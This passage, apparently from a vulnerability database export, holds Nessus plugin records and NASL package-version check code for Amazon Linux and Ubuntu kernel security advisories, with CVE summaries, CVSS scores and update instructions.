{'reference':'kernel-headers-4.14.214-160.339.amzn2', 'cpu':'i686', 'release':'AL2'},\n {'reference':'kernel-headers-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-livepatch-4.14.214-160.339-1.0-0.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-tools-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-tools-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-tools-debuginfo-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-tools-debuginfo-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-tools-devel-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-tools-devel-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'perf-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'perf-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'perf-debuginfo-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'perf-debuginfo-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'python-perf-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'python-perf-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'python-perf-debuginfo-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'python-perf-debuginfo-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-x86_64 / etc\");\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-29T01:20:52", "description": "The version of kernel installed on the remote host is prior to 4.14.214-118.339. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1477 advisory.\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and\n then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c.\n This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in\n fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and performing some operations can\n cause slab-out-of-bounds write access in __btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for\n the number of data stripes is mishandled. (CVE-2019-19816)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-26T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2021-1477)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19816", "CVE-2020-27815", "CVE-2019-19813", "CVE-2020-29569", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-01-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1477.NASL", "href": "https://www.tenable.com/plugins/nessus/145458", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1477.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145458);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\n \"CVE-2019-19813\",\n \"CVE-2019-19816\",\n \"CVE-2020-27815\",\n \"CVE-2020-29568\",\n \"CVE-2020-29569\",\n \"CVE-2020-29660\",\n \"CVE-2020-29661\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1477\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2021-1477)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of kernel installed on the remote host is prior to 4.14.214-118.339. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1477 advisory.\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and\n then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c.\n This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in\n fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and performing some operations can\n cause slab-out-of-bounds write access in __btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for\n the number of data stripes is mishandled. (CVE-2019-19816)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1477.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-19813\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-19816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-27815\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29569\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29660\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update kernel' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19816\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"hotfixes.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (get_one_kb_item(\"Host/kpatch/kernel-cves\"))\n{\n set_hotfix_type(\"kpatch\");\n cve_list = make_list(\"CVE-2019-19813\", \"CVE-2019-19816\", \"CVE-2020-27815\", \"CVE-2020-29568\", \"CVE-2020-29569\", \"CVE-2020-29660\", \"CVE-2020-29661\");\n if (hotfix_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"kpatch hotfix for ALAS-2021-1477\");\n }\n else\n {\n __rpm_report = hotfix_reporting_text();\n }\n}\npkgs = [\n {'reference':'kernel-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-debuginfo-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-debuginfo-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-debuginfo-common-i686-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-debuginfo-common-x86_64-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-devel-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-devel-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-headers-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-headers-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-tools-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-tools-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-tools-debuginfo-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-tools-debuginfo-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'kernel-tools-devel-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'kernel-tools-devel-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'perf-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'perf-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'perf-debuginfo-4.14.214-118.339.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'perf-debuginfo-4.14.214-118.339.amzn1', 'cpu':'x86_64', 'release':'ALA'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-x86_64 / etc\");\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-25T15:23:50", "description": "The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-4748-1 advisory.\n\n - An issue was discovered in the Linux kernel before 5.7.3, related to mm/gup.c and mm/huge_memory.c. The\n get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider\n the semantics of read operations and therefore can grant unintended write access, aka CID-17839856fd58.\n (CVE-2020-29374)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-23T00:00:00", "title": "Ubuntu 16.04 LTS : Linux kernel vulnerabilities (USN-4748-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-27815", "CVE-2020-29374", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-03-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-vivid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-vivid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-wily", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1122-aws", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-utopic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1150-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-utopic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-utopic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-utopic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1086-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-wily", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1146-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-wily", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1088-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-vivid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-vivid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-wily", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-4748-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147975", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4748-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147975);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/24\");\n\n script_cve_id(\n \"CVE-2020-27815\",\n \"CVE-2020-29374\",\n \"CVE-2020-29568\",\n \"CVE-2020-29660\",\n \"CVE-2020-29661\"\n );\n script_xref(name:\"USN\", value:\"4748-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Linux kernel vulnerabilities (USN-4748-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-4748-1 advisory.\n\n - An issue was discovered in the Linux kernel before 5.7.3, related to mm/gup.c and mm/huge_memory.c. The\n get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider\n the semantics of read operations and therefore can grant unintended write access, aka CID-17839856fd58.\n (CVE-2020-29374)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4748-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1086-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1088-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1122-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1146-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-1150-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4.0-203-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-utopic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-vivid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-wily\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-utopic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-vivid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-wily\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-utopic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-vivid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-wily\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-utopic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-vivid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-wily\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-lts-xenial\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice 